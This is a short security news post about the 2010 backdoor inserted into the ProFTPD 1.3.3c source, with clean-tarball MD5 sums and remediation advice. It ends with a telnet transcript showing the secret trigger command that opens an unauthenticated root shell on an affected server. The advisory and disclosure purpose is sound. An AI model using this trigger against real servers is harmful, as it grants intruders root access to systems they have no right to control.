ProFTPD 1.3.3c Briefly Backdoored by Hackers

Servers of the widely popular FTP server, ProFTPD, were compromised (probably with 0day) on the 28th of November 2010. During the attack, some source code was modified to insert a backdoor. The source files affected were for ProFTPD version 1.3.3c., between the 28/11/2010 and 02/12/2010.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.

If you installed or updated ProFTPD from one of the official mirrors during that time, it is recommended that you recompile from a known good version of the code. The source modification was spotted and rectified on 01/12/2010. MD5 sums for the valid source tarballs:

8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2

4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

Hit the jump for details on how the backdoor is triggered. A Metasploit module is available to automate the exploit.

$ telnet 0 21

Trying 0.0.0.0…

Connected to 0.

Escape character is ‘^]’.

220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]

HELP

214-The following commands are recognized (* =>’s unimplemented):

CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV

EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD

XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP

NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*

PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU

APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST

NLST    STAT    SITE    MLSD    MLST

214 Direct comments to someone@somewhere

HELP ANOOP

502 Unknown command ‘ANOOP’

HELP a

502 Unknown command ‘A’

HELP ACIDBITCHEZ

id ;

uid=0(root) gid=0(root) groups=0(root),65534(nogroup)